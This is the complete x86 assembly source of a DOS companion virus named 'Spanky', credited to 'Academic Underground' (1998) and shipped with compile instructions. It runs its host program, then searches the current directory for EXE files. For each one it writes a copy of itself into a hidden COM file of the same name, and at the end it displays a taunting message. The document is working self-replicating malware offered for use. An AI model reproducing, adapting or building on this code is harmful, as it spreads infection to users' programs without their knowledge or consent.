;Spanky Virus ; ; A sample companion virus that will search it's current directory for ; EXE files and then copy itself to a hidden COM file with the same ; name. Before execution of the virus it executes it's Host program. ; ; To compile: ; TASM spanky.asm ; TLINK /t spanky.obj ; ; (c) Sept 1998 Academic Underground .model tiny .code FNAME EQU 9Eh ; DTA - Search results org 100h SPANKY: mov sp, offset END_V + 100h mov ah, 4Ah ; Resize Memory call mov bx, sp mov cl,4 shr bx,cl ; Divide by 16 inc bx ; BX has # of Paragraphs that we want int 21h mov bx, 2Ch ; Setup EXEC block for FCB mov ax, [bx] mov WORD PTR [PARAM_BLK], ax ; PSP Env Segment mov ax,cs mov word ptr [PARAM_BLK+4], ax ; PSP Command line mov word ptr [PARAM_BLK+8], ax ; PSP-> first FCB mov word ptr [PARAM_BLK+12], ax ; PSP-> second FCB mov ax, 4B00h ; Load & Execute mov bx,offset PARAM_BLK ; The exe Param block mov dx,offset REAL_NAME ; Name of host EXE int 21h ; Executes host cli mov bx, ax ; Save return code mov ax,cs mov ss,ax ; Restore stack mov sp,(END_V - SPANKY) + 200h sti push bx mov ds,ax ; Restore data segment mov es,ax ; Restore extra segment mov ah,1Ah ; Set DTA function mov dx,80h ; Put it at offset 80h int 21h pop ax mov ax, 4e00h ; Find first file mov dx, offset EXE_FILE ; Search String (*.EXE) mov cx, 0 ; No file attributes int 21h ; Search. SEARCH_AGAIN: jc DONE ; Nope, no EXEs...quit. call INFECT ; Found one! Infect. mov ah,4fh ; Find Next (DTA already set) int 21h ; Find it. jmp SEARCH_AGAIN INFECT: mov si, FNAME ; DTA Search Results mov di, offset REAL_NAME COPY_LOOP: lodsb ; Load from SI stosb ; Store it in DI (REAL_NAME) or al,al ; Check for NULL jnz COPY_LOOP ; Nope not done...keep copying mov ah,3CH ; Creat file function mov word ptr [si-4],'OC'; Change filename to COM ext. mov word ptr [si-2],'M' mov dx, FNAME ; Which now has a COM extension mov cx, 2 ; Use the Hidden Attribute int 21h ; Creat the file jc INF_EXIT ; Damn somethings wrong, quit. mov bx,ax ; BX = FILEHANDLE mov ah,40h ; Write to file mov cx,END_V - SPANKY ; Size of virus mov dx,offset SPANKY ; Start of virus int 21h ; Write it! mov ah,3Eh ; Close file function int 21h INF_EXIT: ret PAYLOAD: mov ah,9h ; Write string mov dx,offset MSG ; String to write int 21h ; Display it ret DONE: call PAYLOAD ; Execute Payload mov ax,4c00h ; Quit without error int 21h ; Return to DOS EXE_FILE db '*.EXE',0 ; Find all EXE files MSG db 13,10,'Microsoft does not REALLY love you!',13,10,' -- Spanky$' REAL_NAME db 13 dup (?) ; Our Host's Name PARAM_BLK dw ? ; Env Segment dd 80H ; Command Line dd 5Ch ; First FCB dd 6Ch ; Second FCB END_V: END SPANKY